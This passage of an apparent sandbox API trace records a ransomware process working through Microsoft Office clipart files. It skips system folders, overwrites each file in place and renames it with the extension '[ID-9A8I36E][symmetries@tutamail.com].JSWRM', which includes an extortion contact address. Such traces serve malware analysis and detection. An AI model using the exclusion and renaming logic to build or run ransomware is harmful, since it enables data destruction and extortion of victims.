lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.650] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3390, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3390, lpOverlapped=0x0) returned 1 [0083.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.650] CloseHandle (hObject=0x314) returned 1 [0083.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0083.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0083.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0083.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0083.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0083.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0083.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0083.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0083.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0083.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0083.651] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151067.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151067.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0083.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0083.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0083.652] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe84140d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe84140d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe84140d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3418, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0151073.WMF", cAlternateFileName="")) returned 1 [0083.652] lstrcmpiW (lpString1="J0151073.WMF", lpString2=".") returned 1 [0083.653] lstrcmpiW (lpString1="J0151073.WMF", lpString2="..") returned 1 [0083.653] lstrcmpiW (lpString1="J0151073.WMF", lpString2="...") returned 1 [0083.653] lstrcmpiW (lpString1="J0151073.WMF", lpString2="windows") returned -1 [0083.653] lstrcmpiW (lpString1="J0151073.WMF", lpString2="recovery") returned -1 [0083.653] lstrcmpiW (lpString1="J0151073.WMF", lpString2="perflogs") returned -1 [0083.653] lstrcmpiW (lpString1="J0151073.WMF", lpString2="documents and settings") returned 1 [0083.653] lstrcmpiW (lpString1="J0151073.WMF", lpString2="$RECYCLE.BIN") returned 1 [0083.653] lstrcmpiW (lpString1="J0151073.WMF", lpString2="system volume information") returned -1 [0083.653] lstrcmpiW (lpString1="J0151073.WMF", lpString2="msocache") returned -1 [0083.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0083.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151073.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151073.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0151073.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0083.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0083.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151073.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151073.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0151073.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0083.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0083.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0083.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0083.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151073.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151073.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.654] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13336) returned 1 [0083.654] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3410) returned 0x24d210 [0083.654] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3410, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3410, lpOverlapped=0x0) returned 1 [0083.664] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.664] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3410, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3410, lpOverlapped=0x0) returned 1 [0083.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.664] CloseHandle (hObject=0x314) returned 1 [0083.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0083.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0083.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0083.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0083.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0083.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0083.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0083.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0083.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0083.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0083.665] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151073.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151073.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151073.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151073.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0083.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0083.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0083.666] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe84140d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe84140d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe84140d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0151581.WMF", cAlternateFileName="")) returned 1 [0083.666] lstrcmpiW (lpString1="J0151581.WMF", lpString2=".") returned 1 [0083.666] lstrcmpiW (lpString1="J0151581.WMF", lpString2="..") returned 1 [0083.666] lstrcmpiW (lpString1="J0151581.WMF", lpString2="...") returned 1 [0083.666] lstrcmpiW (lpString1="J0151581.WMF", lpString2="windows") returned -1 [0083.666] lstrcmpiW (lpString1="J0151581.WMF", lpString2="recovery") returned -1 [0083.666] lstrcmpiW (lpString1="J0151581.WMF", lpString2="perflogs") returned -1 [0083.666] lstrcmpiW (lpString1="J0151581.WMF", lpString2="documents and settings") returned 1 [0083.666] lstrcmpiW (lpString1="J0151581.WMF", lpString2="$RECYCLE.BIN") returned 1 [0083.666] lstrcmpiW (lpString1="J0151581.WMF", lpString2="system volume information") returned -1 [0083.666] lstrcmpiW (lpString1="J0151581.WMF", lpString2="msocache") returned -1 [0083.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0083.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151581.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151581.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0151581.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0083.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0083.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151581.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151581.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0151581.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0083.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0083.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0083.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0083.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151581.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.667] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10752) returned 1 [0083.667] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2a00) returned 0x24d210 [0083.667] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2a00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2a00, lpOverlapped=0x0) returned 1 [0083.679] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.679] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2a00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2a00, lpOverlapped=0x0) returned 1 [0083.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.679] CloseHandle (hObject=0x314) returned 1 [0083.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0083.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0083.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0083.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0083.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0083.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0083.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0083.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0083.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0083.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0083.680] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151581.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151581.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0083.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0083.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0083.680] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe84140d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe84140d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe84140d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x610c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152414.WMF", cAlternateFileName="")) returned 1 [0083.680] lstrcmpiW (lpString1="J0152414.WMF", lpString2=".") returned 1 [0083.680] lstrcmpiW (lpString1="J0152414.WMF", lpString2="..") returned 1 [0083.680] lstrcmpiW (lpString1="J0152414.WMF", lpString2="...") returned 1 [0083.680] lstrcmpiW (lpString1="J0152414.WMF", lpString2="windows") returned -1 [0083.680] lstrcmpiW (lpString1="J0152414.WMF", lpString2="recovery") returned -1 [0083.680] lstrcmpiW (lpString1="J0152414.WMF", lpString2="perflogs") returned -1 [0083.680] lstrcmpiW (lpString1="J0152414.WMF", lpString2="documents and settings") returned 1 [0083.680] lstrcmpiW (lpString1="J0152414.WMF", lpString2="$RECYCLE.BIN") returned 1 [0083.680] lstrcmpiW (lpString1="J0152414.WMF", lpString2="system volume information") returned -1 [0083.681] lstrcmpiW (lpString1="J0152414.WMF", lpString2="msocache") returned -1 [0083.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0083.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152414.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152414.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152414.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0083.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0083.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152414.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152414.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152414.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0083.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0083.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0083.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0083.681] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152414.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152414.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.681] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24844) returned 1 [0083.681] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6100) returned 0x24d210 [0083.681] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6100, lpOverlapped=0x0) returned 1 [0083.691] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.691] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6100, lpOverlapped=0x0) returned 1 [0083.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.692] CloseHandle (hObject=0x314) returned 1 [0083.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0083.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0083.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0083.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0083.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0083.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0083.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0083.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0083.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: 